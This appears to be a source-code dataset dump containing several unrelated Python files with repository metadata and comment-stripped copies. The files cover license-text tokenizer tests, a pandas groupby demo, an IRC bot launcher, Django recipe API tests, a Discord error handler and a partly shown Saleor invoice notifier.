(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_can_handle_contiguous_template_regions(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}
{{6 }}of its contributors may materials provided with the
distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=1, start_char=25, end_line=1, end_char=27, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=28, end_line=1, end_char=31, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=44, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=45, end_line=1, end_char=48, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=58, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=59, end_line=1, end_char=67, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=68, end_line=1, end_char=72, end=0, gap=0, value=u'with'),
Token(start=0, start_line=1, start_char=73, end_line=1, end_char=76, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=31, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_ngram_tokenizer_can_handle_gaps_at_end_of_text(self):
lines = [u'Neither the name of {{10 the ORGANIZATION}} ']
ngram_len = 2
result = list(ngram_tokenizer(lines, ngram_len, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'neither', u'the')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=16, end=2, gap=0, value=(u'the', u'name')),
Token(start=2, start_line=0, start_char=12, end_line=0, end_char=19, end=3, gap=10, value=(u'name', u'of'))
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n3(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_n1(self):
lines = [u'X11 License']
ngram_len = 1
result = list(ngram_tokenizer(lines, ngram_len))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=3, end=0, gap=0, value=(u'x11',)),
Token(start=1, start_line=0, start_char=4, end_line=0, end_char=11, end=1, gap=0, value=(u'license',)),
]
assert expected == result
def test_ngram_tokenizer_returns_correct_offsets_template(self):
lines = [u'X11 License']
ngram_len = 3
result = list(ngram_tokenizer(lines, ngram_len, template=True))
assert lines == list(doc_subset(lines, result[0]))
expected = [Token(start=0, start_line=0, start_char=0, end_line=0, end_char=11, end=1, gap=0, value=(u'x11', u'license'))]
assert expected == result
def test_unicode_text_lines_handles_weird_xml_encodings(self):
test_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom')
result = list(unicode_text_lines(test_file))
expected_file = self.get_test_loc('analysis/weird_encoding/easyconf-0.9.0.pom.expected')
with open(expected_file, 'rb') as tf:
expected = cPickle.load(tf)
assert expected == result
class TestMultigrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
@skipIf(True, 'Performance tests only')
class TestAnalysisPerformance(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_splitter_perf(self):
test_file = self.get_test_loc('perf/test.txt')
text = open(test_file).read() * 100
utext = unicode(text)
setup1 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws =re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts= re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
def check_perf(setup):
from timeit import timeit
stmt = 'list(w for w in %s(%s))'
print()
print('Unicode template')
print(timeit(stmt % ('unicode_ts', 'utext'), setup=setup, number=1000))
print('Plain template')
print(timeit(stmt % ('plain_ts', 'text'), setup=setup, number=1000))
print('Unicode words')
print(timeit(stmt % ('unicode_ws', 'utext'), setup=setup, number=1000))
print('Plain words')
print(timeit(stmt % ('plain_ws', 'text'), setup=setup, number=1000))
print('Plain split')
print(timeit('text.split()', setup=setup, number=1000))
print('Unicode split')
print(timeit('utext.split()', setup=setup, number=1000))
print('Line split')
print(timeit('text.splitlines(False)', setup=setup, number=1000))
print('Line split with ends')
print(timeit('text.splitlines(True)', setup=setup, number=1000))
check_perf(setup=setup1)
setup2 = '''
import re
from textcode import analysis
unicode_ws = analysis.word_splitter
plain_ws =re.compile(r'[^\W_]+').finditer
unicode_ts = analysis.template_splitter
plain_ts= re.compile(r'(?:[^\W_])+|(?:\{\{)|(?:\}\})').finditer
text = %r
utext = %r''' % (text, utext)
check_perf(setup=setup2)
| true
| true
|
790afbc9aeeb08b0b8b41599887496d1db936b30
| 630
|
py
|
Python
|
BasicOperations/05_Pandas/05_Pandas_02_groupby.py
|
UpSea/midProjects
|
ed6086e74f68b1b89f725abe0b270e67cf8993a8
|
[
"MIT"
] | 1
|
2018-07-02T13:54:49.000Z
|
2018-07-02T13:54:49.000Z
|
BasicOperations/05_Pandas/05_Pandas_02_groupby.py
|
UpSea/midProjects
|
ed6086e74f68b1b89f725abe0b270e67cf8993a8
|
[
"MIT"
] | null | null | null |
BasicOperations/05_Pandas/05_Pandas_02_groupby.py
|
UpSea/midProjects
|
ed6086e74f68b1b89f725abe0b270e67cf8993a8
|
[
"MIT"
] | 3
|
2016-05-28T15:13:02.000Z
|
2021-04-10T06:04:25.000Z
|
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(10,3),columns=['a','b','c'],index=list('abcdefghij'))
print(df)
df.ix[::2,0] = np.nan; df.ix[::4,1] = np.nan; df.ix[::3,2] = np.nan;
df = df.dropna(subset=['a','b']) #mid delete rows where df['htm3']==na
bins = np.arange(-3,3,0.1)
bins = [-100,0,100]
indices = np.digitize(df.a,bins)
'''
bins代表若干连续的区间0:[-1,2),1:[2,7),2:[7,9),3:[9,10),用数组表示为:[-1,2,7,9,10]
np.digitize()函数生成一列数,对应位置的值表示参数一对应值在bins中所属区段的编号。
'''
groups = df.groupby(indices)
print('#'*20)
for i,group in groups:
print(i,len(group))
print(group)
print('#'*20)
print(groups.mean())
| 26.25
| 87
| 0.631746
|
import pandas as pd
import numpy as np
df = pd.DataFrame(np.random.randn(10,3),columns=['a','b','c'],index=list('abcdefghij'))
print(df)
df.ix[::2,0] = np.nan; df.ix[::4,1] = np.nan; df.ix[::3,2] = np.nan;
df = df.dropna(subset=['a','b'])
bins = np.arange(-3,3,0.1)
bins = [-100,0,100]
indices = np.digitize(df.a,bins)
groups = df.groupby(indices)
print('#'*20)
for i,group in groups:
print(i,len(group))
print(group)
print('#'*20)
print(groups.mean())
| true
| true
|
790afc2450ce2af23351778162b454ecb9eac51c
| 1,375
|
py
|
Python
|
__init__.py
|
wolfy1339/Kenni
|
5885b5e600c6cb4a1db2ad82ec0f5b24d3fc0b4f
|
[
"EFL-2.0"
] | null | null | null |
__init__.py
|
wolfy1339/Kenni
|
5885b5e600c6cb4a1db2ad82ec0f5b24d3fc0b4f
|
[
"EFL-2.0"
] | null | null | null |
__init__.py
|
wolfy1339/Kenni
|
5885b5e600c6cb4a1db2ad82ec0f5b24d3fc0b4f
|
[
"EFL-2.0"
] | null | null | null |
#!/usr/bin/env python3
import sys, os, time, threading, signal
import bot
class Watcher(object):
# Cf. http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/496735
def __init__(self):
self.child = os.fork()
if self.child != 0:
self.watch()
def watch(self):
try: os.wait()
except KeyboardInterrupt:
self.kill()
sys.exit()
def kill(self):
try: os.kill(self.child, signal.SIGKILL)
except OSError: pass
def run_kenni(config):
if hasattr(config, 'delay'):
delay = config.delay
else: delay = 20
def connect(config):
p = bot.kenni(config)
p.use_ssl = config.ssl
p.use_sasl = config.sasl
p.run(config.host, config.port)
try: Watcher()
except Exception as e:
print('Warning:', e, '(in __init__.py)', file=sys.stderr)
while True:
try: connect(config)
except KeyboardInterrupt:
sys.exit()
if not isinstance(delay, int):
break
warning = 'Warning: Disconnected. Reconnecting in %s seconds...' % delay
print(warning, file=sys.stderr)
time.sleep(delay)
def run(config):
t = threading.Thread(target=run_kenni, args=(config,))
if hasattr(t, 'run'):
t.run()
else: t.start()
if __name__ == '__main__':
print(__doc__)
| 24.122807
| 80
| 0.584
|
import sys, os, time, threading, signal
import bot
class Watcher(object):
def __init__(self):
self.child = os.fork()
if self.child != 0:
self.watch()
def watch(self):
try: os.wait()
except KeyboardInterrupt:
self.kill()
sys.exit()
def kill(self):
try: os.kill(self.child, signal.SIGKILL)
except OSError: pass
def run_kenni(config):
if hasattr(config, 'delay'):
delay = config.delay
else: delay = 20
def connect(config):
p = bot.kenni(config)
p.use_ssl = config.ssl
p.use_sasl = config.sasl
p.run(config.host, config.port)
try: Watcher()
except Exception as e:
print('Warning:', e, '(in __init__.py)', file=sys.stderr)
while True:
try: connect(config)
except KeyboardInterrupt:
sys.exit()
if not isinstance(delay, int):
break
warning = 'Warning: Disconnected. Reconnecting in %s seconds...' % delay
print(warning, file=sys.stderr)
time.sleep(delay)
def run(config):
t = threading.Thread(target=run_kenni, args=(config,))
if hasattr(t, 'run'):
t.run()
else: t.start()
if __name__ == '__main__':
print(__doc__)
| true
| true
|
790afd1d19d32dd258ab61a4b68347d143f85086
| 6,633
|
py
|
Python
|
app/recipe/tests/test_recipe_api.py
|
jamie-chapman/django-exercise-recipe-app
|
0ad569c747ca3dc538dbda1d1035a2d2c438f43b
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_recipe_api.py
|
jamie-chapman/django-exercise-recipe-app
|
0ad569c747ca3dc538dbda1d1035a2d2c438f43b
|
[
"MIT"
] | null | null | null |
app/recipe/tests/test_recipe_api.py
|
jamie-chapman/django-exercise-recipe-app
|
0ad569c747ca3dc538dbda1d1035a2d2c438f43b
|
[
"MIT"
] | null | null | null |
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
from core.models import Recipe, Ingredient
RECIPE_URL = reverse('recipe:recipe-list')
def recipe_url(id):
"""Construct URL for a single recipe based on its ID"""
return reverse('recipe:recipe-detail', args=[id])
def create_sample_recipe(**params):
"""Helper function to create a user"""
return Recipe.objects.create(**params)
class RecipeAPITests(TestCase):
def setUp(self):
self.client = APIClient()
def test_create_recipe_with_ingredients(self):
"""Test creating a recipe including ingredients"""
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.post(RECIPE_URL, payload, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
payload['name'],
Recipe.objects.get(id=response.data['id']).name
)
self.assertEquals(
len(response.data['ingredients']),
len(payload['ingredients'])
)
def test_get_recipes(self):
"""Test retrieving a recipe"""
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name='Beans on Toast',
description='Just the best.'
)
response = self.client.get(RECIPE_URL)
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), len(recipes))
def test_get_recipe(self):
"""Test retrieving a single recipe using name as filter"""
test_recipe_name = 'Beans on Toast'
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name=test_recipe_name,
description='Just the best recipe.'
)
response = self.client.get(RECIPE_URL, {'name': test_recipe_name})
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotEqual(len(response.data), len(recipes))
self.assertEqual(response.data[0]['name'], test_recipe_name)
def test_update_recipe(self):
"""Test updating a recipe"""
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.'
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.recipe.name, response.data['name'])
self.assertEqual(self.recipe.description, response.data['description'])
def test_delete_recipe(self):
"""Test deleting a recipe"""
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
def test_get_recipes_with_ingredients(self):
"""Test retrieving a recipe including ingredients"""
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.get(RECIPE_URL)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEquals(
len(response.data[0]['ingredients']),
len(ingredients)
)
def test_update_recipe_ingredients(self):
"""Test updating a recipe with ingredients included"""
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(ingredients), len(payload['ingredients']))
self.assertEqual(ingredients[0].recipe.name, payload['name'])
def test_delete_recipe_with_ingredients(self):
"""Test deleting a recipe with ingredients included"""
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
self.assertFalse(len(ingredients), 0)
| 31.889423
| 79
| 0.599276
|
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
from core.models import Recipe, Ingredient
RECIPE_URL = reverse('recipe:recipe-list')
def recipe_url(id):
return reverse('recipe:recipe-detail', args=[id])
def create_sample_recipe(**params):
return Recipe.objects.create(**params)
class RecipeAPITests(TestCase):
def setUp(self):
self.client = APIClient()
def test_create_recipe_with_ingredients(self):
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.post(RECIPE_URL, payload, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(
payload['name'],
Recipe.objects.get(id=response.data['id']).name
)
self.assertEquals(
len(response.data['ingredients']),
len(payload['ingredients'])
)
def test_get_recipes(self):
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name='Beans on Toast',
description='Just the best.'
)
response = self.client.get(RECIPE_URL)
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(response.data), len(recipes))
def test_get_recipe(self):
test_recipe_name = 'Beans on Toast'
create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
create_sample_recipe(
name=test_recipe_name,
description='Just the best recipe.'
)
response = self.client.get(RECIPE_URL, {'name': test_recipe_name})
recipes = Recipe.objects.all().order_by('-name')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertNotEqual(len(response.data), len(recipes))
self.assertEqual(response.data[0]['name'], test_recipe_name)
def test_update_recipe(self):
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.'
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(self.recipe.name, response.data['name'])
self.assertEqual(self.recipe.description, response.data['description'])
def test_delete_recipe(self):
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
def test_get_recipes_with_ingredients(self):
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.get(RECIPE_URL)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEquals(
len(response.data[0]['ingredients']),
len(ingredients)
)
def test_update_recipe_ingredients(self):
self.recipe = create_sample_recipe(
name='Roast Dinner',
description='Roasted potatoes and chicken'
' with vegetables and gravy.'
)
payload = {
'name': 'Vegan Roast Dinner',
'description': 'Roasted potatoes and mushroom wellington'
' with vegetables and gravy.',
'ingredients': [
{'name': 'carrots'},
{'name': 'potatoes'},
{'name': 'mushrooms'},
]
}
response = self.client.patch(
recipe_url(self.recipe.id),
payload, format='json'
)
self.recipe.refresh_from_db()
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(len(ingredients), len(payload['ingredients']))
self.assertEqual(ingredients[0].recipe.name, payload['name'])
def test_delete_recipe_with_ingredients(self):
self.recipe = create_sample_recipe(
name='Carrot Cake',
description='Sponge cake with hella carrots.'
)
Ingredient.objects.create(name='Carrots', recipe=self.recipe)
Ingredient.objects.create(name='Icing Sugar', recipe=self.recipe)
response = self.client.delete(
recipe_url(self.recipe.id),
format='json'
)
ingredients = Ingredient.objects.all()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.assertFalse(Recipe.objects.all())
self.assertFalse(len(ingredients), 0)
| true
| true
|
790afdca3defef0b96aa368a82626bcd7132e02d
| 4,324
|
py
|
Python
|
cogs/errorhandler.py
|
ZackHart2400/miso-bot
|
bbdcf65e1c5ed1dfe472f91804dcc39ae556dd83
|
[
"MIT"
] | null | null | null |
cogs/errorhandler.py
|
ZackHart2400/miso-bot
|
bbdcf65e1c5ed1dfe472f91804dcc39ae556dd83
|
[
"MIT"
] | null | null | null |
cogs/errorhandler.py
|
ZackHart2400/miso-bot
|
bbdcf65e1c5ed1dfe472f91804dcc39ae556dd83
|
[
"MIT"
] | null | null | null |
import traceback
import discord
import asyncio
from discord.ext import commands, flags
from helpers import exceptions, log, utilityfunctions as util
from data import database as db
logger = log.get_logger(__name__)
command_logger = log.get_logger("commands")
class Events(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
"""The event triggered when an error is raised while invoking a command."""
if hasattr(ctx.command, "on_error"):
return
error = getattr(error, "original", error)
if isinstance(error, commands.CommandNotFound):
return
if isinstance(error, commands.MissingRequiredArgument):
return await util.send_command_help(ctx)
command_logger.error(
f'{type(error).__name__:25} > {ctx.guild} ? {ctx.author} "{ctx.message.content}" > {error}'
)
if isinstance(error, util.ErrorMessage):
return await ctx.send(str(error))
if isinstance(error, commands.MissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: You require {perms} permission to use this command!"
)
elif isinstance(error, commands.BotMissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: Cannot execute command! Bot is missing permission {perms}"
)
elif isinstance(error, commands.CommandOnCooldown):
if db.is_patron(ctx.author.id, (2, 3)):
return await ctx.reinvoke()
else:
return await ctx.send(
f":hourglass: This command is on a cooldown! (`{error.retry_after:.2f}s` remaining)"
)
elif isinstance(error, commands.DisabledCommand):
await ctx.send(f":warning: `{ctx.command}` has been disabled!")
elif isinstance(error, commands.NoPrivateMessage):
await ctx.author.send(
":warning: You cannot use this command in private messages"
)
elif isinstance(error, util.PatronCheckFailure):
await ctx.send(":no_entry: Support me on patreon to use this command! <https://patreon.com/joinemm>")
elif isinstance(error, (commands.NotOwner, commands.CheckFailure)):
await ctx.send(
":warning: Sorry, you are not authorized to use this command!"
)
elif isinstance(error, exceptions.BlacklistTrigger):
if error.blacklist_type == "command":
message = "This command has been blacklisted by the server moderators"
elif error.blacklist_type == "channel":
message = "Command usage on this channel has been blacklisted by the server moderators"
elif error.blacklist_type == "user":
message = "You have been blacklisted from using commands by the server moderators"
elif error.blacklist_type == "global":
message = "You have been blacklisted from using Miso Bot"
delete = error.do_delete
await ctx.send(
f":no_entry_sign: `{message}`", delete_after=(5 if delete else None)
)
if delete:
await asyncio.sleep(5)
await ctx.message.delete()
elif isinstance(error, (commands.BadArgument, flags._parser.ArgumentParsingError)):
await ctx.send(f"```{str(error)}```")
elif isinstance(error, discord.errors.Forbidden):
try:
await ctx.send(f"```{str(error)}```")
except discord.errors.Forbidden:
try:
await ctx.message.add_reaction("🙊")
except discord.errors.Forbidden:
logger.error(str(error))
elif isinstance(error, exceptions.LastFMError):
await ctx.send(f"```{str(error)}```")
else:
traceback.print_exception(type(error), error, error.__traceback__)
await ctx.send(f"```\n{type(error).__name__}: {str(error)}```")
def setup(bot):
bot.add_cog(Events(bot))
| 37.929825
| 113
| 0.598289
|
import traceback
import discord
import asyncio
from discord.ext import commands, flags
from helpers import exceptions, log, utilityfunctions as util
from data import database as db
logger = log.get_logger(__name__)
command_logger = log.get_logger("commands")
class Events(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if hasattr(ctx.command, "on_error"):
return
error = getattr(error, "original", error)
if isinstance(error, commands.CommandNotFound):
return
if isinstance(error, commands.MissingRequiredArgument):
return await util.send_command_help(ctx)
command_logger.error(
f'{type(error).__name__:25} > {ctx.guild} ? {ctx.author} "{ctx.message.content}" > {error}'
)
if isinstance(error, util.ErrorMessage):
return await ctx.send(str(error))
if isinstance(error, commands.MissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: You require {perms} permission to use this command!"
)
elif isinstance(error, commands.BotMissingPermissions):
perms = ", ".join(f"`{x}`" for x in error.missing_perms)
return await ctx.send(
f":warning: Cannot execute command! Bot is missing permission {perms}"
)
elif isinstance(error, commands.CommandOnCooldown):
if db.is_patron(ctx.author.id, (2, 3)):
return await ctx.reinvoke()
else:
return await ctx.send(
f":hourglass: This command is on a cooldown! (`{error.retry_after:.2f}s` remaining)"
)
elif isinstance(error, commands.DisabledCommand):
await ctx.send(f":warning: `{ctx.command}` has been disabled!")
elif isinstance(error, commands.NoPrivateMessage):
await ctx.author.send(
":warning: You cannot use this command in private messages"
)
elif isinstance(error, util.PatronCheckFailure):
await ctx.send(":no_entry: Support me on patreon to use this command! <https://patreon.com/joinemm>")
elif isinstance(error, (commands.NotOwner, commands.CheckFailure)):
await ctx.send(
":warning: Sorry, you are not authorized to use this command!"
)
elif isinstance(error, exceptions.BlacklistTrigger):
if error.blacklist_type == "command":
message = "This command has been blacklisted by the server moderators"
elif error.blacklist_type == "channel":
message = "Command usage on this channel has been blacklisted by the server moderators"
elif error.blacklist_type == "user":
message = "You have been blacklisted from using commands by the server moderators"
elif error.blacklist_type == "global":
message = "You have been blacklisted from using Miso Bot"
delete = error.do_delete
await ctx.send(
f":no_entry_sign: `{message}`", delete_after=(5 if delete else None)
)
if delete:
await asyncio.sleep(5)
await ctx.message.delete()
elif isinstance(error, (commands.BadArgument, flags._parser.ArgumentParsingError)):
await ctx.send(f"```{str(error)}```")
elif isinstance(error, discord.errors.Forbidden):
try:
await ctx.send(f"```{str(error)}```")
except discord.errors.Forbidden:
try:
await ctx.message.add_reaction("🙊")
except discord.errors.Forbidden:
logger.error(str(error))
elif isinstance(error, exceptions.LastFMError):
await ctx.send(f"```{str(error)}```")
else:
traceback.print_exception(type(error), error, error.__traceback__)
await ctx.send(f"```\n{type(error).__name__}: {str(error)}```")
def setup(bot):
bot.add_cog(Events(bot))
| true
| true
|
790afdcdd7b5cfeedf70ea27145720e97263e4f9
| 1,445
|
py
|
Python
|
saleor/invoice/notifications.py
|
nestfiy/saleor
|
6fce3bc5c0ca72ac28db99553e6d2b49249c6dac
|
[
"CC-BY-4.0"
] | 1,392
|
2021-10-06T15:54:28.000Z
|
2022-03-31T20:50:55.000Z
|
saleor/invoice/notifications.py
|
nestfiy/saleor
|
6fce3bc5c0ca72ac28db99553e6d2b49249c6dac
|
[
"CC-BY-4.0"
] | 888
|
2021-10-06T10:48:54.000Z
|
2022-03-31T11:00:30.000Z
|
saleor/invoice/notifications.py
|
nestfiy/saleor
|
6fce3bc5c0ca72ac28db99553e6d2b49249c6dac
|
[
"CC-BY-4.0"
] | 538
|
2021-10-07T16:21:27.000Z
|
2022-03-31T22:58:57.000Z
|
from typing import TYPE_CHECKING, Optional
from ..core.notification.utils import get_site_context
from ..core.notify_events import NotifyEventType
from ..graphql.core.utils import to_global_id_or_none
if TYPE_CHECKING:
from ..account.models import User
from ..app.models import App
from ..plugins.manager import PluginsManager
from .models import Invoice
def get_invoice_payload(invoice):
return {
"id": to_global_id_or_none(invoice),
"number": invoice.number,
"download_url": invoice.url,
"order_id": to_global_id_or_none(invoice.order),
}
def send_invoice(
invoice: "Invoice",
staff_user: "User",
app: Optional["App"],
manager: "PluginsManager",
):
"""Send an invoice to user of related order with URL to download it."""
payload = {
"invoice": get_invoice_payload(invoice),
"recipient_email": invoice.order.get_customer_email(), # type: ignore
"requester_user_id": to_global_id_or_none(staff_user),
"requester_app_id": to_global_id_or_none(app) if app else None,
**get_site_context(),
}
channel_slug = None
if invoice.order and invoice.order.channel:
channel_slug = invoice.order.channel.slug
manager.notify(
NotifyEventType.INVOICE_READY, payload, channel_slug=channel_slug
) # type: ignore
manager.invoice_sent(invoice, invoice.order.get_customer_email()) # type: ignore
| 32.111111
| 85
| 0.703806
|
from typing import TYPE_CHECKING, Optional
from ..core.notification.utils import get_site_context
from ..core.notify_events import NotifyEventType
from ..graphql.core.utils import to_global_id_or_none
if TYPE_CHECKING:
from ..account.models import User
from ..app.models import App
from ..plugins.manager import PluginsManager
from .models import Invoice
def get_invoice_payload(invoice):
return {
"id": to_global_id_or_none(invoice),
"number": invoice.number,
"download_url": invoice.url,
"order_id": to_global_id_or_none(invoice.order),
}
def send_invoice(
invoice: "Invoice",
staff_user: "User",
app: Optional["App"],
manager: "PluginsManager",
):
payload = {
"invoice": get_invoice_payload(invoice),
"recipient_email": invoice.order.get_customer_email(),
"requester_user_id": to_global_id_or_none(staff_user),
"requester_app_id": to_global_id_or_none(app) if app else None,
**get_site_context(),
}
